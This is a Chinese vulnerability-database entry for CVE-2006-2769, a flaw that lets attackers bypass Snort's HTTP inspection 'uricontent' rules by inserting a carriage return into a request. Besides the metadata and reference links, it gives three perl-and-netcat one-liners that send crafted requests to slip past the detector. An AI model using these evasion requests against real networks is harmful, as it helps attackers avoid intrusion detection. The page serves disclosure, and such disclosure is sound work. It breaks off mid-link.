Snort HTTP检测预处理器 访问控制绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110357 漏洞类型 权限许可和访问控制
发布时间 2006-05-31 更新时间 2007-06-20
CVE编号 CVE-2006-2769 CNNVD-ID CNNVD-200606-060
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/27931
https://www.securityfocus.com/bid/18200
https://cxsecurity.com/issue/WLB-2006060024
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-060
|漏洞详情
Snort中的HTTP检测预处理器(http_inspect)允许远程攻击者通过在URL之后和在HTTP声明之前的一个回车键(\r)来绕过"uricontent"规则。
|漏洞EXP
source: http://www.securityfocus.com/bid/18200/info

Snort is reportedly prone to a vulnerability that may allow malicious packets to bypass detection. 

A successful attack can allow attackers to bypass intrusion detection and to carry out attacks against computers protected by Snort.

This vulnerability affects Snort 2.4.4. Other versions may be vulnerable as well.

perl -e'print "GET /www.example.com?paramter=|backdoor\r http/1.0\r\n\r\n"'|nc vulnerable.server 80

perl -e 'print "GET \x90\x90\x0d http/1.0\r\n\r\n"'|nc 192.168.1.3 80

perl -e 'print "GET \x0d/index.php\x90\x90 HTTP/1.0\n\r\n"'|nc 192.168.1.3 80
|受影响的产品
SuSE SUSE Linux Enterprise Server 8 + Linux kernel 2.4.21 + Linux kernel 2.4.19 SuSE Linux Openexchange Server SuSE Linux
|参考资料

来源:BID
名称:18200
链接:http://www.securityfocus.com/bid/18200
来源:OSVDB
名称:25837
链接:http://www.osvdb.org/25837
来源:VUPEN
名称:ADV-2006-2119
链接:http://www.frsirt.com/english/advisories/2006/2119
来源:MISC
链接:http://www.demarc.com/support/downloads/patch_20060531
来源:SECTRACK
名称:1016191
链接:http://securitytracker.com/id?1016191
来源:MLIST
名称:[Snort-devel]20060531SnortUricontentBypassVulnerability
链接:http://marc.theaimsgroup.com/?l=snort-devel&m=114909074311462&w=2
来源:www.snort.org
链接:http://www.snort.org/pub-bin/snortnews.cgi#431
来源:BUGTRAQ
名称:20060603Re:NewSnortBypass-Patch-BypassofPatch
链接:http://www.securityfocus.com/archive/1/archive/1/435872/100/0/threaded
来源:BUGTRAQ
名称:20060602Re:NewSnortBypass-Patch-BypassofPatch
链接:http://www.securityfocus.com/archive/1/archive/1/435797/100/0/threaded
来源:BUGTRAQ
名称:20060602NewSnortBypass-Patch-BypassofPatch
链接:http://www.securityfocus.com/archive/1/archive/1/435734/100/0/threaded
来源:BUGTRAQ
名称:20060601SnortHTTPInspectPre-ProcessorUricontentBypass
链接:http://ww